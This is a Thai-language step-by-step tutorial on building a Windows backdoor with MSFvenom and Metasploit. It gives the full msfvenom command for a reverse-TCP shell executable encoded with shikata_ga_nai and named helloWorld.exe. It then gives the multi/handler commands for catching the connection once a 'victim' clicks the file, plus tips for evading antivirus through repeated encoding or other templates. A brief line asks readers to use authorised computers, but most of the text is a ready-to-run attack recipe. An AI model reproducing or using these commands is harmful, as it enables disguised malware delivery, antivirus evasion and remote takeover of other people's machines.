แบ็คดอร์ใช้เพื่อเลี่ยงกลไกการรักษาความปลอดภัย ซึ่งมักจะเป็นความลับและส่วนใหญ่ตรวจไม่พบ เมื่อใช้ MSFvenom ซึ่งเป็นการรวมกันของ msfpayload และ msfencode คุณสามารถสร้างแบ็คดอร์ที่เชื่อมต่อกลับไปยังผู้โจมตีโดยใช้ reverse shell TCP ในการพัฒนาแบ็คดอร์ คุณต้องเปลี่ยนลายเซ็นของมัลแวร์เพื่อหลบเลี่ยงซอฟต์แวร์ป้องกันไวรัส ทำโปรเจ็กต์นี้ให้เสร็จสมบูรณ์บนคอมพิวเตอร์คู่หนึ่งที่คุณได้รับอนุญาตให้เข้าถึง และในกระบวนการนี้ คุณจะได้เรียนรู้เพิ่มเติมเกี่ยวกับความปลอดภัยของคอมพิวเตอร์และวิธีการทำงานของแบ็คดอร์ประเภทนี้
ขั้นตอน
ขั้นตอนที่ 1 เริ่มต้น Kali และเปิดคอนโซลเทอร์มินัล
ขั้นตอนที่ 2 พิมพ์ ifconfig เพื่อแสดงอินเทอร์เฟซและตรวจสอบที่อยู่ IP ของคุณ
ขั้นตอนที่ 3 พิมพ์ msfvenom -l encoders เพื่อแสดงรายการของ encoders
คุณจะใช้ x86/shikata_ga_nai เป็นตัวเข้ารหัส
ขั้นตอนที่ 4. พิมพ์ "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows กำหนดสถาปัตยกรรมที่จะใช้
- -p windows/shell/reverse_tcp กำหนดเพย์โหลดที่จะฝัง
- LHOST กำหนดที่อยู่ IP ของผู้ฟัง
- LPORT กำหนดพอร์ตผู้ฟัง
- -b "\x00" กำหนดเพื่อหลีกเลี่ยงอักขระที่ไม่ถูกต้อง (ไบต์ว่าง)
- -e x86/shikata_ga_nai กำหนดชื่อตัวเข้ารหัส
- -f exe > helloWorld.exe กำหนดเอาต์พุตรูปแบบ
ขั้นตอนที่ 5. พิมพ์ msfconsole เพื่อเปิดใช้งาน Metasploit
ตอนนี้คุณได้สร้างแบ็คดอร์ของคุณแล้ว เมื่อเหยื่อคลิกที่ helloWorld.exe เชลล์เพย์โหลดที่ฝังไว้จะถูกเปิดใช้งานและทำการเชื่อมต่อกับระบบของคุณ ในการรับการเชื่อมต่อ คุณต้องเปิดตัวจัดการหลายตัวใน Metasploit และตั้งค่าเพย์โหลด
ขั้นตอนที่ 6 พิมพ์ use exploit/multi/handler
ขั้นตอนที่ 7 พิมพ์ set payload windows/shell/reverse_tcp
ขั้นตอนที่ 8. พิมพ์ show options เพื่อตรวจสอบโมดูล
ขั้นตอนที่ 9. พิมพ์ set LHOST 192.168.48.129
"LHOST" กำหนดที่อยู่ IP ของผู้ฟัง
ขั้นตอนที่ 10. พิมพ์ set LPORT 4444
"LPORT" กำหนดพอร์ตผู้ฟัง
ขั้นตอนที่ 11 พิมพ์ run และรอการเชื่อมต่อจากเครื่องของเหยื่อ
ขั้นตอนที่ 12. รอให้เหยื่อคลิกที่ helloWorld.exe
จากนั้นคุณจะเชื่อมต่อกับเครื่องของเหยื่อได้สำเร็จ
เคล็ดลับ
- การใช้ -i ใน MSFvenom จะแสดงการวนซ้ำของการเข้ารหัส บางครั้งการวนซ้ำหลายครั้งอาจช่วยหลีกเลี่ยงซอฟต์แวร์ AV
- คุณได้เรียนรู้วิธีสร้างแบ็คดอร์และเข้ารหัสโดยใช้ MSFvenom แล้ว แต่วิธีนี้ใช้ไม่ได้ผลกับซอฟต์แวร์ AV บางตัวในปัจจุบัน เหตุผลเบื้องหลังเป็นเพราะเทมเพลตการดำเนินการใน MSFvenom ผู้จำหน่าย AV ได้เพิ่มลายเซ็นคงที่ของเทมเพลตเหล่านี้และเพียงแค่มองหา วิธีแก้ปัญหานี้คือการใช้เทมเพลตการดำเนินการอื่นหรือเครื่องมืออื่น